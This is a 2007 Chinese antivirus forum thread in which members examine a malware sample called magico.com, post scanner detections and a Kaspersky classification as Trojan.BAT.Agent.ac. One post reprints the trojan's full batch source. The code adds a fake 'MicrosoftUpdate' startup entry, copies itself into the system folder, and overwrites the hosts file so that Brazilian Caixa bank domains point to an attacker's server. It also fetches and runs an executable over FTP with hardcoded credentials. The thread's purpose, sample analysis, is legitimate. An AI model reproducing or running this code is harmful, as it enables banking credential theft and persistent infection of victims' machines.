MD5 50891E magico.com （这两个项目完了之后大家可以自由发挥）---新规定发帖范例

lanvin

MD5是压缩包的指纹验证码

[ 本帖最后由 lanvin 于 2007-6-4 15:01 编辑 ]

kp2006

Win32:Trojan-gen. {Delphi}

scottxzt

pass

taihuxian

Virus: Win32:Trojan-gen. {Delphi}

Virus found while downloading Web content.

Address: bbs.kafan.cn

傻猪猪米走鸡

com文件？？是不是化石？
应该不是。不过总而言之，nod过了

Nblock

原帖由 傻猪猪米走鸡 于 2007-6-4 12:17 发表
com文件？？是不是化石？
应该不是。不过总而言之，nod过了

你双击下就知道了~  微点kill

人浪流涯天

@echo off
@break off

ver|find "Windows 98">nul
if not errorlevel 1 goto win

:xp
if not exist %WinDir%\system32\systemdll.exe goto insxp
if exist %WinDir%\system32\systemdll.exe goto chk

:insxp
echo y|reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftUpdate /t REG_SZ /d %WinDir%\system32\systemdll.exe
copy correio_magico.com  %WinDir%\system32\systemdll.exe
start /max iexplore.exe "http://correio.cartoes-legais.com/"
goto dns

:chk
set ping=%windir%\system32\ping.exe
%ping% www.google.com -n 1 -l 1 | find "TTL" > nul
if not errorlevel 1 goto dns
goto chk

:dns
for /f "tokens=2" %%D in ('nslookup dns1.cocanaocola.com ^| find "Address"') do set dns1=%%D
set w=www
set co=com
set go=gov
set ca=cai
set c1=in^t^erne^t%ca%x^a.%ca%x^a.%go%.b^r
set c2=%w%.%ca%x^a.%co%.b^r
set c3=%w%^.%ca%x^a^.%go%.b^r
set c4=%w%^.c^ef.%co%.b^r
set c5=%w%.^c^e^f.^%go%.^br
set c6=%w%.%ca%x^aeco^nom^ic^a.%co%.br
set c7=%w%.%ca%x^ae^con^om^ic^a^.%go%^.b^r
set c8=%w%.%ca%xaec^on^omi^cafe^d^e^r^al^.%co%.^b^r
set c9=%ca%x^a^.%co%^.^b^r
set c10=%ca%^xa^.^%go%.^br
set c11=c^e^f.^%co%^.^b^r
set c12=ce^f.%go%^.^br
set c13=%ca%xae^co^n^o^mica.%co%^.^br
set c14=%ca%xa^e^c^o^no^mi^ca^.^%go%.^b^r
echo %dns1% %c1%>%windir%\temp\cevfr.007
echo %dns1% %c2%>>%windir%\temp\cevfr.007
echo %dns1% %c3%>>%windir%\temp\cevfr.007
echo %dns1% %c4%>>%windir%\temp\cevfr.007
echo %dns1% %c5%>>%windir%\temp\cevfr.007
echo %dns1% %c6%>>%windir%\temp\cevfr.007
echo %dns1% %c7%>>%windir%\temp\cevfr.007
echo %dns1% %c8%>>%windir%\temp\cevfr.007
echo %dns1% %c9%>>%windir%\temp\cevfr.007
echo %dns1% %c10%>>%windir%\temp\cevfr.007
echo %dns1% %c11%>>%windir%\temp\cevfr.007
echo %dns1% %c12%>>%windir%\temp\cevfr.007
echo %dns1% %c13%>>%windir%\temp\cevfr.007
echo %dns1% %c14%>>%windir%\temp\cevfr.007
type %windir%\temp\cevfr.007>%windir%\system32\drivers\etc\hosts
del /q /f %windir%\temp\cevfr.007
exit

:win
if exist "%windir%\\All Users\Menu Iniciar\Programas\Iniciar\"systemdll.exe goto png
copy correiomagico.com "%windir%\All Users\Menu Iniciar\Programas\Iniciar\"systemdll.exe
start /max iexplore.exe "http://correio.cartoes-legais.com/"
goto dwn

:png
set pong=%windir%\ping.exe
%pong% www.google.com -n 1 -l 1 | find "vida" > nul
if not errorlevel 1 goto dwn
goto png

:dwn
if exist %windir%\winstart.exe goto upd
cd %temp%
echo extremus>%temp%\a
echo chakarov>>%temp%\a
echo cd www>>%temp%\a
echo cd images>>%temp%\a
echo cd global>>%temp%\a
echo get winstart.exe>>%temp%\a
echo quit>>%temp%\a
ftp -s:%temp%\a ftp.extremus.info
copy %temp%\winstart.exe %windir%
del %temp%\winstart.exe
del %temp%\a

:upd
cd %temp%
%windir%\winstart.exe http://x.cocanaocola.com/
type x>%windir%\hosts
del x
exit

ＲＺ　病毒

Redevil

创建值        \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate
试图使用命令行参数运行浏览器: "C:\Program Files\Internet Explorer\iexplore.exe"  "http://correio.cartoes-legais.com/"。
创建文件        C:\DOCUME~1\Redevil\LOCALS~1\Temp\bt0206.bat
修改值很多键值
修改hosts文件 加入
66.111.50.50 internetcaixa.caixa.gov.br
66.111.50.50 www.caixa.com.br
66.111.50.50 www.caixa.gov.br
66.111.50.50 www.cef.com.br
66.111.50.50 www.cef.gov.br
66.111.50.50 www.caixaeconomica.com.br
66.111.50.50 www.caixaeconomica.gov.br
66.111.50.50 www.caixaeconomicafederal.com.br
66.111.50.50 caixa.com.br
66.111.50.50 caixa.gov.br
66.111.50.50 cef.com.br
66.111.50.50 cef.gov.br
66.111.50.50 caixaeconomica.com.br
66.111.50.50 caixaeconomica.gov.br

[ 本帖最后由 Redevil 于 2007-6-4 13:34 编辑 ]

wangjay1980

Hello.

New malicious software was found in the attached file.
Trojan.BAT.Agent.ac
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Roman Gavrilchenko
Virus Analyst, Kaspersky Lab.

Ph.: +7(495) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com   http://www.viruslist.com
http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.


> Attachment: magico.zip

wangjay1980

deleted: Trojan program Trojan.BAT.Agent.ac        File: C:\Documents and Settings\Owner\×ÀÃæ\magico.zip/magico.com//BAT